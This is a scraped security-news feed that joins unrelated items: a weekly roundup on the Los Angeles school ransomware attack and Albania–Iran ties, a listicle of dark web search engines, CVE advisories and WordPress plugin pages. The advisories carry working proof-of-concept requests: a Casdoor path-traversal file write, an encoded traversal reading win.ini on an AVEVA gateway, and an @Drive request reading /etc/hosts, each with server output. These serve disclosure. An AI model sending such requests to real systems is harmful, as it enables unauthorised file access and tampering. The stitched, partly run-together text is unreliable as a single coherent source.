Plus: Albania cuts ties with Iran, claims of a TikTok data breach that didn’t happen, and much more.

Russia’s full-scale invasion of Ukraine hasn’t gone to Vladimir Putin’s plan: Its troops have suffered devastating losses, failed to capture key Ukrainian cities, and been pushed back toward Russia. However, domestically, the Kremlin has succeeded in further suppressing its citizens—including blocking independent news media and other access to impartial information. Now, a new tool lets people in Russia access websites the Kremlin has blocked, giving them access to news that’s not dictated by the state’s propaganda machine.

The Biden administration is reportedly readying itself to take action against TikTok, following years of suggestions that the Chinese-owned app is a threat to national security. This week we looked at the problem with TikTok: that lawmakers can’t decide on what threat, if any, the app really poses.

Elsewhere, Apple revealed the new iPhone 14. Alongside this, it announced that iOS 16 will be available for people to download from September 12. This means Apple’s new passkey technology, which eliminates the need for passwords, will be available to millions of people. Here’s everything you need to know about Apple’s passkeys.

But wait, there’s more! Each week, we highlight the news we didn’t cover in-depth ourselves. Click on the headlines below to read the full stories. And stay safe out there.

With more than 400,000 students ranging from kindergarten to 12th grade, the Los Angeles Unified School District is one of the largest school districts in the US. On September 6, the district became the latest to be targeted by ransomware. In a statement published online, the district’s administrators said it had detected “unusual activity” within its networks, saying it had been targeted by ransomware; despite the attack, students have been able to attend school.

The attack prompted a large response from officials, with the FBI and Department of Homeland Security assisting local law enforcement. Students and staff have lost access to their email systems, local reports say. It is also unclear, according to reports, whether students' information, including disciplinary records and assessments, was accessed by the attackers. The school district says that students and employees must reset their passwords to their school accounts while physically attending school district sites. “The District has staggered password reset access to minimize congestion from simultaneous users accessing the website,” officials said in a statement.

The Vice Society ransomware group has claimed responsibility for the attack. Following the incident, the Cybersecurity and Infrastructure Security Agency (CISA) and other partners published a warning about Vice Society, saying it has been “disproportionately targeting the education sector.” The Los Angeles attack is the latest against educational institutions: According to a report by security firm Sophos based on a survey of 499 respondents, 56 percent of lower education and 64 percent of higher education organizations were hit by ransomware in the past year, a “considerable increase” from the previous year.

Back in July, the government websites of Albania were knocked offline. Last month, security company Mandiant researchers revealed that Iranian hackers, working on behalf of Tehran, were likely to be behind the attacks, which took out public services for hours. “These are disruptive attacks, which affect the lives of everyday Albanians who live within the NATO alliance,” John Hultquist, Mandiant’s vice president of intelligence, told WIRED when it published its findings.

This week, the government of Albanian took the unprecedented step to cut diplomatic ties with Iran, accusing it of launching the cyberattack. The country also ordered Iranian embassy staff to leave the country. “The deep investigation put at our disposal undeniable evidence that the cyberattack against our country was orchestrated and sponsored by the Islamic Republic of Iran which had involved four groups for the attack on Albania,” prime minister Edi Rama said in a statement. (Microsoft conducted the investigation for the Albanian government.)

Hackers Target Los Angeles School District With Ransomware

By Waqas
When it comes to the best dark web search engines, first and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.
This is a post from HackRead.com Read the original post: 8 Online Best Dark Web Search Engines for Tor Browser (2022)

The **Dark Web**, also known as the Dark Net, is a part of the Internet that is not accessible through standard web browsers. It can only be accessed through specialized software such as the Tor browser.

The Dark Web is often associated with illegal activity such as cybercrime including drug dealing, child abuse, and terrorism. However, there are also many legitimate uses for the Dark Web, such as anonymity for whistleblowers and journalists. **Facebook** and **Twitter** also have their dark web domains. (_If you didn’t know now you know_).

Despite its reputation, the Dark Web is a relatively small part of the overall Internet. It is estimated that only around 4% of all websites are accessible through the **Tor browser**.

**What is a Tor Browser?**

The Tor Browser is a free and open-source web browser that is based on the Mozilla Firefox web browser. The Tor Browser is designed to protect your privacy and anonymity when using the internet.

The Tor Browser routes your internet traffic through a network of servers, making it difficult for anyone to track your online activity. The Tor Browser is available for Windows, macOS, and Linux.

Tor is short for “The Onion Router”. The Tor network was **originally developed** by the US Naval Research Laboratory as a way to securely communicate between government agencies.

The Tor network consists of a series of volunteer-run servers that route internet traffic through a series of encrypted tunnels. This makes it difficult for anyone to track your online activity or identify your location.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**You May Also Like**

1.  **What Are Dark Web Search Engines and How to Find Them?**
2.  **Brave Browser enters dark web with its own Tor Onion service**
3.  **Online Anonymity – How to Keep Yourself Safe and Unidentified**
4.  **Why torrenting on Elon Musk’s Starlink Internet is not a good idea?**
5.  **USA Wants Russians to Share Secret Info with the CIA on the Dark Web**

**Best Dark Web Search Engines for Tor Browser**

When it comes to the best dark web search engines, there are a few things to keep in mind. First and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.

Additionally, you want a search engine that is fast and efficient, so you can get the information you need without any delays. Assuming those are your priorities, here are 8 dark web search engines to use with Tor Browser:

**1\. Ahmia.fi**

Ahmia.fi is a search engine designed to allow access to the so-called “dark web” or “dark net” – a hidden part of the internet that can only be accessed using specific software, such as the Tor browser.

Ahmia is one of a small number of dark web search engines that allow users to access the dark web, and it has been praised for making this otherwise hidden part of the internet more accessible.

However, Ahmia also has a policy against any “abuse material,” something different from many other dark web search engines that also index websites featuring child sexual abuse content.

Ahmia is available on the **surface web** and supports searches on the i2p network as well. You can visit Ahmia’s .Onion domain **here**. 

Home page of Ahmia dark web search engine

**2\. Haystak**

Haystak is one of the dark web search engines designed for the Tor network. The search engine claims to have indexed over 1.5 billion pages which includes more than 260,000 websites, Haystak indeed would stand out to be a resourceful engine on the list.

Haystak also has a paid version which offers a number of additional features such as searching using regular expressions, browsing now-defunct onion sites, and accessing their API. You can visit Haystak by following its .Onion link **here**. 

Home page of Haystak dark web search engine

**3\. The Hidden Wiki**

The Hidden Wiki is a dark web directory that can only be accessed using the Tor network. The site contains links to a variety of different websites. The Hidden Wiki is a valuable resource for those who wish to explore the dark web, as it provides a safe and easy way to access a variety of different sites.

A **surface web version** is also available. You can visit The Hidden Wiki by following its .Onion link **here**. 

Home page of The Hidden Wiki

**4\. Torch**

Torch is one of those dark web search engines that have lasted for long enough (since 1996). Torch, like other search engines, crawls these addresses and indexes their content, making it searchable for users.

However, speaking based on personal experience, its search results are not impressive. For instance, I wanted to know Twitter’s onion URL, a very simple piece of information. Yet, it reported everything but that showing how far these search engines have to go in order to improve.

On the other hand, it is fast and can come in handy regardless. Nevertheless, you can visit Torch by following its .Onion link **here**. 

Home page of Torch dark web search engine

**5\. Recon**

This particular search engine was built by Hugbunt3r, a prominent member of the popular **Dread service** on the dark web. It aims to serve as a database through which users can search for products from different vendors in different marketplaces on the dark web.

Individual profile viewing options for vendors & marketplaces are also available including details like ratings, mirror links, number of listings, and uptime percentage. You can visit Recon by following its .Onion link **here** and just in case you manage to bypass its DDoS protection captcha page let us know in the comment section because we failed to do so. (_Good luck_).

Home page of Recon dark web search engine

**6\. DuckDuckGo**

Did you know DuckDuckGo is available on the dark web and they have their .Onion domain as well? Yes, but it only displays results from the surface web even if used on the Tor browser.

Yet, when it comes to anonymity DuckDuckGo has a proven track record which is why the privacy advocate team behind DDG is known as a long-time foe of Google. You can visit DuckDuckGo by visiting its .Onion link **here**. 

Home page of DuckDuckGo dark web search engine

**7\. Onion Search**

Onion Search is a search engine for the dark web that enables users to find and access Onion sites. The site is designed to be used with the Tor browser, which allows users to browse the internet anonymously.

A look at its about page reveals that the search engine is being operated from France as the search engine acknowledges to be “fully compliant with the Law of France.” Another noteworthy option on the search engines is that one can report child abuse content to the administrator who vows to remove it.

Onion Search is available on the **clear net** as well as on the dark web through its **.Onion domain**.

Home page of Onion Search dark web search engine

**8\. Deep Search**

Deep Search is a search engine for the dark web. It is designed to index and search onionspace, the hidden services portion of the Tor network. DeepSearch is open source and available for anyone to use.

According to my personal experience, Deep Search seems to provide pretty accurate and useful results, unlike others who spam users with spam links. Another noteworthy feature of Deep Search is that it provides a list of marketplaces, exchanges, and websites involved in scamming users.

If you want to give Deep Search a try check their .Onion domain **here**.

Home page of Deep Search dark web search engine

To conclude, you may also find the links of other dark web search engines but these happen to be the ones that stand out the most.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**What NOT TO DO on Dark Web?**

The dark web is a place full of potential danger. There are many things that can go wrong when visiting the dark web, and it’s important to be aware of them before you go. Here are some things to avoid doing on the dark web:

*   Don’t click on any links unless you know where they lead. Many links on the dark web lead to illegal drug markets, child abuse content, malicious sites, or downloads.

*   Never enter your personal information into any form on the dark web. This includes your name, address, email, and phone number.

*   Don’t download anything from the dark web unless you trust the source. There are many viruses and malware lurking on the dark web, waiting to be downloaded by unsuspecting users.

*   Never ever download illegal and abusive content that includes content against children, torture, blackmail, and other malicious content.

**Use a VPN**

Although the Tor browser protects your online privacy using a **reliable VPN** at the same time is a plus. A VPN will encrypt your traffic and hide your IP address, making it much harder for someone to track you down. Additionally, if you are on a clear net, a VPN will give you access to blocked websites and content.

1.  **Tor Anonymity: Things NOT To Do While Using Tor**
2.  **CISA Publishes List of Free Cybersecurity Tools and Services**
3.  **New Underactor tool reveals pixelated text to expose sensitive data**
4.  **Download Kali Linux 2022.1 with new tools and wider SSH compatibility**
5.  **Cybersecurity, Big Data, Automation Tools: What Marketers Need To Know**

8 Online Best Dark Web Search Engines for Tor Browser (2022)

Casdoor v1.97.3 was discovered to contain an arbitrary file write vulnerability via the fullFilePath parameter at /api/upload-resource.

Hi, I found a security issue, when the upload provider is Storage Local File System, the fullFilePath parameter of the interface /api/upload-resource will have a directory spanning problem, the user can specify a relative path to write malicious files to the file system, or even overwrite the files, my request message is shown below：

POST /api/upload-resource?owner=built-in&user=admin&application=app-built-in&tag=custom&parent=provider\_storage\_local\_file\_system&fullFilePath=resource%2F%2e%2e%2F%2e%2e%2Fweb%2Fbuild%2Fflag.html&provider=provider\_storage\_local\_file\_system HTTP/1.1
Host: door.casdoor.com
Cookie: casdoor\_session\_id=2fd9ab275d8d65ea296ab327fd92166a
Content-Length: 192
Sec-Ch-Ua: ".Not/A)Brand";v="99", "Google Chrome";v="103", "Chromium";v="103"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10\_15\_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Sec-Ch-Ua-Platform: "macOS"
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUPAwhIoXMrbemuJM
Accept: \*/\*
Origin: https://door.casdoor.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://door.casdoor.com/resources
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

\------WebKitFormBoundaryUPAwhIoXMrbemuJM
Content-Disposition: form-data; name="file"; filename="spider.png"
Content-Type: image/png

I'm here.
\------WebKitFormBoundaryUPAwhIoXMrbemuJM--

Then we can find out that the problem does occur by following this link。  
https://door.casdoor.com/flag.html

CVE-2022-38638: Arbitrary file write/overwrite Vulnerability · Issue #1035 · casdoor/casdoor

Arq Backup 7.19.5.0 and below stores backup encryption passwords using reversible encryption. This issue allows attackers with administrative privileges to recover cleartext passwords.

**CVE-2022-36617 Report**

**From:**  
**To:** ██████████  
**Product:** Arq Backup  
**Date:** July 15th, 2022  
**Date of public disclosure:** September 7th, 2022  
**Attachments:**  
 arqbackup.zip

**09/07/2019 Author's Note:**  
As of September 7th, 2022, CVE-2022-36617 has been patched with the release of Arq Backup 7.19.10.0 for Windows / 7.19.3 for macOS.

Hi Stefan,

First off, let me just say that I really like Arq Backup. I've been using it on my laptop for over a year now, and it fills its niche perfectly.

The vulnerability I discovered is that backup encryption passwords are stored locally in a reversibly encrypted way, which would allow malware running locally with administrative privileges to steal the user's password(s). I've included a proof of concept demo script of this in the attached zip file (password is "█████████").

Thankfully, this is pretty easy to fix. As Arq already derives the backup encryption key from the user's password with a slow key derivation function, it does not have to store the user's password—only the derived encryption key.

Note that is is not a problem to store other types of secrets (e.g. OAuth refresh tokens, etc.) in a reversibly encrypted way as they are not reused. In contrast, users will reuse passwords elsewhere, so compromise by an attacker grants access beyond that legitimately needed for Arq's normal operation.

I will be following the industry standard of responsible disclosure with this vulnerability, as elucidated in Google's policy. Your deadline is (July 14 + 90 days = ) October 12th, 2022.

Please notify me when you have successfully reproduced the vulnerability using my proof of concept, or if you have trouble doing so. Additionally, feel free to email me about any other matter in connection with my report; I'm here to help.

Thank you for your time.

Kind regards,  
Sam Haskins

**Timeline:**  
(America/Toronto time zone)  
**July 11th, 2022:** Vulnerability discovered.  
**July 13th, 2022:** Initial contact made with vendor via support email.  
**July 15th, 2022:** Report submitted to vendor.  
**July 20th, 2022:** Contacted by vendor president.  
**July 20-28, 2022:** Vulnerability acknowledged by vendor.  
**July 21st, 2022:** CVE requested.  
**August 10th, 2022:** Notified by vendor that a patch was developed.  
**September 2nd, 2022:** Assigned CVE-2022-36617.  
**September 6th, 2022:** Patched version released.  
**September 7th, 2022:** Report published.  
**October 12th, 2022:** 90 days public disclosure deadline.

CVE-2022-36617: CVE-2022-36617

InTouch Access Anywhere Secure Gateway versions 2020 R2 and below suffer from a path traversal vulnerability.

    Title:======AVEVA InTouch Access Anywhere Secure Gateway - Path TraversalAuthor:=======Jens Regel, CRISEC IT-SecurityCVE:====CVE-2022-23854Advisory:=========https://crisec.de/advisory-aveva-intouch-access-anywhere-secure-gateway-path-traversal/Timeline:=========25.06.2021 Vulnerability discovered25.06.2021 Send details to custfirstsupport@aveva.com21.09.2021 Vendor response, fix is available until Q1/202225.09.2021 Vendor released Tech Alert TA00002233506.09.2022 Public disclosureVendor:=======AVEVA Group plc is a marine and plant engineering IT company headquartered in Cambridge, England. AVEVA software is used in many sectors, including on- and off-shore oil and gas processing, chemicals, pharmaceuticals, nuclear and conventional power generation, nuclear fuel reprocessing, recycling and shipbuilding (https://www.aveva.com).Affected Products:==================InTouch Access Anywhere Secure Gateway versions 2020 R2 and olderDetails:========A security vulnerability exists in InTouch Access Anywhere Secure Gateway versions 2020 R2 and older. This is a Relative Path Traversal vulnerability which allows an unauthenticated user with network access to the Secure Gateway to read files on the system outside of the Secure Gateway web server.Proof of Concept:=================GET /AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini HTTP/1.1HTTP/1.1 200 OKServer: EricomSecureGateway/8.4.0.26844.*(..); for 16-bit app support[fonts][extensions][mci extensions][files][Mail]MAPI=1Fix:====InTouch Access Anywhere Secure Gateway 2020 R2 (version 20.1.0) HotfixInTouch Access Anywhere Secure Gateway 2020b (version 20.0.1) Hotfix

InTouch Access Anywhere Secure Gateway 2020 R2 Path Traversal

@Drive version 2.8 suffers from a local file inclusion vulnerability.

    # Exploit Title: @Drive 2.8  Local File inclusion# Date: Sep 8, 2022# Exploit Author: Chokri Hammedi# Vendor Homepage: https://evolutive.co/# Software Link: https://apps.apple.com/us/app/drive/id578982909# Version: 2.8# Tested on: iPhone ios 15.6GET /../../../../../../../../../../../../../../../../etc/hosts HTTP/1.1Host: 192.168.1.187User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376eSafari/8536.25Accept: */*Referer: http://192.168.1.187/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close--------HTTP/1.1 200 OKContent-Type: application/octet-streamContent-Length: 213Accept-Ranges: bytesDate: Thu, 08 Sep 2022 14:26:16 GMT### Host Database## localhost is used to configure the loopback interface# when the system is booting.  Do not change this entry.##127.0.0.1 localhost255.255.255.255 broadcasthost::1             localhost

@Drive 2.8 Local File Inclusion

Authenticated (admin+) Stored Cross-Site Scripting (XSS) vulnerability in Apasionados Export Post Info plugin <= 1.1.0 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

**Description**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file, allowing to have an overview of the topics and titles published in the blog.

We created this plugin because we generate large amounts of content for blogs and we often need to lookup the topics that were already covered before in a blog. As we don’t want to export the titles by hand we developed this plugin.

**What can I do with this plugin?**

This plugin exports posts Date published, Post title, Word Count, Status, URL and Category to a CSV file that can be imported into Excel.

**What ideas is this plugin based on?**

We were searching for a plugin that allowed us to export the post titles and found Export All URLs. Unfortunately the plugin didn’t export the publish date, status and word count, so we decided to create a new plugin with this information and the the ability to translate it.

**System requirements**

PHP version 5.5 or greater.

**Export Post Info to CSV Plugin in your Language!**

This first release is avaliable in English and Spanish. In the “languages” folder we have included the necessarry files to translate this plugin.

If you would like the plugin in your language and you’re good at translating, please drop us a line at Contact us.

**Further Reading**

You can access the description of the plugin in Spanish at: Export Post Info to CSV en español.

**Contact**

For further information please send us an email.

**Translating WordPress Plugins**

The steps involved in translating a plugin are:

1.  Run a tool over the code to produce a POT file (Portable Object Template), simply a list of all localizable text. Our plugins allready havae this POT file in the /languages/ folder.
2.  Use a plain text editor or a special localization tool to generate a translation for each piece of text. This produces a PO file (Portable Object). The only difference between a POT and PO file is that the PO file contains translations.
3.  Compile the PO file to produce a MO file (Machine Object), which can then be used in the theme or plugin.

In order to translate a plugin you will need a special software tool like poEdit, which is a cross-platform graphical tool that is available for Windows, Linux, and Mac OS X.

The naming of your PO and MO files is very important and must match the desired locale. The naming convention is: language_COUNTRY.po and plugins have an additional naming convention whereby the plugin name is added to the filename: pluginname-fr_FR.po

That is, the plugin name name must be the language code followed by an underscore, followed by a code for the country (in uppercase). If the encoding of the file is not UTF-8 then the encoding must be specified.

For example:

*   en\_US � US English
*   en\_UK � UK English
*   es\_ES � Spanish from Spain
*   fr\_FR � French from France
*   zh\_CN � Simplified Chinese

A list of language codes can be found here, and country codes can be found here. A full list of encoding names can also be found at IANA.

**Screenshots**

**Installation**

1.  First you will have to upload the plugin to the /wp-content/plugins/ folder.
2.  Then activate the plugin in the plugin panel.
3.  Go to SETTINGS / EXPORT POST INFO.
4.  Save a random string to make it harder for somebody to access your exported data.
5.  Download your CSV file.

**FAQ**

**Why did you make this plugin?**

We couldn’t find a plugin that would give us the functionality we were looking for:  
1) Export publish date.  
2) Export word count.  
3) Easy translation of the plugin into other languages. So far English and Spanish translations are included.

**Why do I have to setup a random string for the name of the export CSV file?**

Other plugins always export the file with the same name and in the same folder so it’s easy to access this file. We don’t want that this file can be easily found, so we decided to let you setup a random string to make the file name harder to guess.

**Does Export Post Info make changes to the database?**

Yes. It created an entry in the options table where the random string is stored.

**How can I check out if the plugin works for me?**

Install and activate. Go to settings / Export Post Info. Save random string. And download CSV file.

**How can I remove Export Post Info to CSV?**

You can simply activate, deactivate or delete it in your plugin management section.

**Which PHP version do I need?**

This plugin has been tested and works with PHP versions 5.5 and greater. WordPress itself recommends using PHP version 7.3 or greater. If you’re using a PHP version lower than 5.5 please upgrade your PHP version or contact your Server administrator.

**Are there any known incompatibilities?**

Yes. On a multi-language site the export will not work correctly.

**Is this plugin compatible with WPML**

Yes, but only the posts of the main language are exported. Post in secondary languages are not exported at this moment. We are working on this because we would like to have this feature but for us it isn’t easy to code.

**Are there any server requirements?**

Yes. The plugin requires a PHP version 5.5 or higher and we recommend using PHP version 7.3 or higher.

**Do you make use of Export Post Info to CSV yourself?**

Of course we do. That’s why we created it. 😉

**Reviews**

From uploading the plugin to downloading the CSV file took about 15 seconds! Just perfect - thank you!

This plugin exported exactly what I needed, and it did it quickly and painlessly. Thanks very much to the devs!

Time saver, works just fine

Super plugin, très simple à utiliser. Merci !

Thank you so much for this amazing little plugin that did exactly what I needed. Saved me hours of work in creating a spreadsheet with all my posts so I can create an optimization checklist. The other popular export all posts plugin only exports the post title, url and category. Without the date and other fields, I would have to go in and manually add that data. Export Post Info (this plugin) did all of it perfectly. Keep up the great work!

October 11, 2018

Not sure why this plug in has no reviews. Did for me EXACTLY what I needed even though it is two years old. Muchas Gracias

Read all 6 reviews

**Contributors & Developers**

“Export Post Info” is open source software. The following people have contributed to this plugin.

Contributors

*    apasionados

**Changelog****1.2.0 (06/Sep/2022)**

*   Security update: Please update your plugin. We escaped data to increase your security.
*   Corrected PHP notices when debug was active.

**1.1.0 (25/Aug/2019)**

*   Now posts with status published, future and private are exported. Until now only posts with status published were exported.
*   Added post status column to the export file.
*   PHP version must be 5.6 or higher. Recommended PHP version: 7.3.

**1.0.4 (08/Abr/2017)**

*   Cleaned up code + Changed functions name to be unique and avoid conflicts with other plugins or themes.

**1.0.3 (07/Abr/2017)**

*   Added check for PHP version when activating the plugin. PHP version must be 5.5 o greater.

**1.0.2 (07/Abr/2017)**

*   Solved error in Word Count with words containing UTF-8 characters.

**1.0.1 (07/Abr/2017)**

*   Word count would not count all words of a post if a tag was present.

**1.0.0 (07/Abr/2017)**

*   First official release.

CVE-2022-38068: Export Post Info

Cross-Site Request Forgery (CSRF) vulnerability in gVectors Team wpForo Forum plugin <= 2.0.5 at WordPress.

CVE-2022-38144: wpForo Forum

Improper restriction of broadcasting Intent in GalaxyStoreBridgePageLinker of?Waterplugin prior to version 2.2.11.22081151 leaks MAC address of the connected Bluetooth device.

CVE-2022-36873

Unauthenticated Event Deletion vulnerability in Totalsoft Event Calendar – Calendar plugin <= 1.4.6 at WordPress.

*   Details
*   Reviews
*   Installation
*   Support
*   Development

Event Calendar is a flexible calendar plugin that allows you to connect to your database and show up your event days on a view. Calendar can render a Day, Week, Month and Resource calendar view. The also provides an interface for manipulating and formatting dates and times. Each event box has a link to the original event you defined in your calendar.

*   Event Calendar Premium
*   All Calendar Demo Types
*   Event Calendar FAQ
*   Event Calendar User Manual
*   Support Forum

**Features**

*   Plugin for create a calendar with events.
*   Intuitive event labels.
*   Easy to customize.
*   Use as a date picker or a full fledged calendar.
*   10 free themes with the option of select data ranges, mark events and others (4 versions of the event calendar type, 2 versions of the simple type, 2 versions of the flexible type and 2 versions of the timeline type)
*   You can easily list your events on wherever you want on your page via shortcodes.
*   Each event box has a link to the original event you defined in your calendar.
*   Allows you to set the most appropriate navigation arrows, which will suit the best for your web site.
*   The ability to display multiple events for a single day.
*   Plugin lets you change the color and set it to the colors of your site.
*   You can change the start and end date of the event.
*   You can change the start and end time of events.
*   You can customize the calendar color, font size and font family.
*   The ability to change the color of the arrow and background color.
*   Each species has a unique customizable settings.
*   Add an unlimited number of events in one calendar. As you have already created a number of events, you can add via the shortcodes on your page as you need.
*   Each calendar can be inserted in a page, post or widget shortcode.
*   You can add photos to the events (all types)
*   Total Calendar, Timeline, Crazy, Schedule and Full Year types each event has its own color.
*   Recurring events
*   Possibility to preview the theme in calendar before putting it on the page.

**Premium version adds**

*   3 beautiful customizable themes
*   Crazy Calendar Theme
*   Schedule Theme
*   Full Year Calendar Theme
*   **Recurring events** – Daily, Weekly, Monthly, Yearly
*   **WeekDay Start** – Can select that day, which must be the first in the week.
*   **Weekday** – Ability to select the style of calendar week.
*   **Todays numbers Color** – Can choose the date color, that will be displayed.
*   **Icon** – Possibility select the right and the left icons, which are, for change the months by sequence.
*   **Color** – The plugin allows to change the color and enter it in the colors of your site.
*   **Font** – The plugin allows to change the color of the date, font size and font family.
*   This opens up new useful functions and new possibilities.

**In addition to the features mentioned above, there are many other functions inside the plugin. You get the advantage of an intuitive user interface, that makes the plugin operation easy, easy to understand the calendar options, as well as many hooks and filters to control the output.**

**Main features of Event.**

*   **Event Title** – You can give a name for event.
*   **Calendar Name** – Choose that version of themes, in which you want to see the Events.
*   **Start Date** – You Can select the start of the event (To display events in the calendar if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **End Date** – You Can select the finish date of the event (To display events if you have a browser Safari, firefox or Internet explorer should write yyyy-mm-dd).
*   **Event URL** – You can set external URL, which should be included in the event.
*   Open in new tab – Choose, by clicking on the link should open in new tab or not.
*   **Start Time (Required field)** – Can select the event start time (To display events in the calendar if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **End Time (Required field)** – Can select the event end time (To display events if you have a browser Safari, Firefox or Internet explorer should write hh:mm).
*   **Event color** – Select that color, which you want to see for your event, which shows in the calendar (Event Color option is only for Event Calendar Type.).
*   **Description** – You can give a description for event.
*   **Event Image/Video** – You can give a Image and Video(YouTube and Vimeo) for event. Event Image and Video option is available for all types.

**Insert plugin to the WordPress page, post, widget** – Every calendar could be inserted into a page, post or widget with shortcode.

**Plugin works in Chrome, Safari, Opera, Firefox, Internet Explorer** – Use your calendar with all the popular browsers.

**Navigation Arrow** – Plugin allows you to get the most suitable navigation arrows that fit best for your website.

**The Plugin is Truly Wonderful** – You can create a very nice and beautiful calendar for your website. The plugin is easily editable and functionality perfectly.

**Link** – There is a special place for adding a Link to each event. Choose to open the Link in the new tab or not.

**Technical Support**

*   If you notice any errors or have any questions with our event calendar, you can notify us. We will investigate and solve the problem. Check out the Event Calendar Support Forum on our website. If you don’t find a solution to your question here, don’t hesitate to click here to contact us.

THANK YOU FOR YOUR INTEREST IN EVENT CALENDAR TS.

Here’s how you install and activate the Event Calendars plugin:

Download the plugin.  
Upload the .zip file in your WordPress plugin directory.  
Activate the plugin from the “Plugins” menu in WordPress.  
After activating Event Calendar, choose the type of version you wish to use.

For users of MAC

*   Go to the downloads folder and local the folder with the event calendar.
*   Right click on the folder and select Compress. Now you have just created the .zip file, which can be installed as described here.
*   Click the download and install button to download and install the plugin.
*   Click the Activate plugin button to activate the calendar plugin.
*   If the installation is succeeded, you will see a message in the image.
*   In case of any problems during the installation of the calendar, please click here to contact us.

**1). There are some restrictions for adding events?**

*   There is no limit for the amount of events.
*   You can add as many events as you want. Plugin has no limitations.

**2.) How many calendar may I create for WordPress website?**

*   You may create unlimited calendars by this plugin and by many options.

**3.) How to change the font size of the theme?**

*   The settings can include custom header settings where you can adjust the font size and see the results in the live preview.

**4.) How can I add plugin in widget?**

*   Get to the widget, then add our plugin widget to the sidebar. Then select your name.

**5.) How many themes can I create for my plugin?**

*   You can create as many themes as you want.

**6.) \*\*\*\* Where to change the settings?**

*   The settings you can change in the manager’s calendar.

**7.) I create an event in the calendar but it does not show. What can I do?**

*   First, check that you don’t have the same plugin again.
*   It is necessary to write the begging and ending day of the event.
*   If you have Safari, Firefox, Opera or Internet Explorer, you must write yyyy-mm-dd , that would show the events in calendar.

**8). How many calendar themes can I create for my plugin?**

*   You can create as many themes as you want.

**9.) How many event can I create for my plugin?**

*   You can create as many events as you need.

**10.) Has each event own color or color is for everyone in Simple Type?**

*   In this version you are setting events color in general options and its for all events. In Total Calendar and Timeline types each event has its own color.

**11.) How to change date format?**

*   If you need to change event date format, please open Event Manager Settings and type necessary type in Date format input. For instance, in case you want to have dates as 08/1/2020, set the format to M/d/Y.

awesomeness in this calendar

I bought the full version. After installing on my template, not everything was fine, but the support from the developer was great / fast. The calendar fully suits me both in terms of features and usability bars - on pages or widgets. So far, I am very satisfied.

In my case I needed a yearly calendar. It is the plugin that I was looking for. Functional, easy to use, cheap ... In addition, the customer service is incredible. I definitely recommend it.

This plugin is all I need for a simple event calendar with no bells and whistles. Had some issues in the beginning with the backend but support fixed them quickly and released an updated version. The only issues I have now, I have with all free plugins. They all seem to think it is okay to bombard us with promotions to upgrade to pro. If that is what we wanted we would have done this once we confirmed the plugin was well structured and we could use the added features. Why not allow us to remove the promos forever? After all there is a link to your page inside the plugin itself if we change our minds later.

We had a Problem with the Size of the Date for one Calendar Type, because we wanted it to be different from the headline of one event, so we contacted the Support. It was really really fast and help us out as fast as possible. They even changed the code for us so we got what we wanted. I never saw that Developer made a change for one single user. Its awesome Service in my opinion! I would recommend this plugin again, if you want to use a simple but clear calendar plugin for wordpress.

Read all 98 reviews

“Event Calendar – Calendar” is open source software. The following people have contributed to this plugin.

Contributors

*    totalsoft

**Version 1.4.8**

*   Changed TS Poll plugin banner

**Version 1.4.7**

*   Fixed a bug in the plugin.

**Version 1.4.6**

*   Fixed issue with theme options.

**Version 1.4.5**

*   Fixed bug with admin panel.

**Version 1.4.4**

*   Added the ability to change the icon to events.
*   Changed several fonts.
*   Fixed bugs related to PHP 8 version.

**Version 1.4.3**

*   Fixed bug in “update” functions.

**Version 1.4.2**

*   Fixed bug in “edit” functions.

**Version 1.4.1**

*   Changed function for font size.
*   Fixed issue in events option.

**Version 1.4.0**

*   Fixed a bug for showing the event.

**Version 1.3.9**

*   Added font for days on the calendar.
*   Fixed bug related icons.

**Version 1.3.8**

*   Added the ability to put days on the center.

**Version 1.3.7**

*   Added the ability to select icons back to the calendar after the event.

**Version 1.3.6**

*   Fixed a bug in the Timeline type. After changing the language this type was did not work.

**Version 1.3.5**

*   Added a new opportunity in the timeline version. Shows the current days at first.
*   Fixed a bug in the flexible version. The start and the end of days in the event, showed only the starting day.
*   Fixed a bug in the Timeline version. When the year did not had any event it do not show the next year�s events.

**Version 1.3.4**

*   The bug in the “Total Soft Calendar” version has been fixed. The description is not shown in the calendar.
*   Fixed a bug with recurring events.

**Version 1.3.3**

*   Added possibility to preview the theme in calendar before putting it on the page.
*   Updated translations.
*   Changed admin menu design.

**Version 1.3.2**

*   Added Google fonts to the basic fonts.
*   Added possibility to make recurring events.
*   Added box shadow options for all types.
*   Fixed bug with media uploading process.

**Version 1.3.1**

*   Updated function for creating Simple type.

**Version 1.3.0**

*   Changed Media uploading function.
*   Changed admin menu style.
